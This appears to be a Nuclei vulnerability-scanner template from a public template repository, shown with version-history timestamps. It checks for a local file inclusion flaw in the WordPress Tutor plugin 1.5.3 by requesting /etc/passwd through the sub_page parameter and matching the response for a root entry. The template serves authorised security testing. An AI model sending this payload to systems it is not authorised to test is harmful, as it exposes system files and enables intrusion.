nuclei-templates/vulnerabilities/wordpress/wp-tutor-lfi.yaml

19 lines
438 B
YAML
Raw Normal View History

2021-05-27 03:15:53 +00:00
id: wp-tutor-lfi
info:
name: WordPress Plugin tutor.1.5.3 - Local File Inclusion
author: 0x240x23elu
severity: high
reference: https://www.exploit-db.com/exploits/48058
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd"
matchers:
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-05-27 03:15:53 +00:00
part: body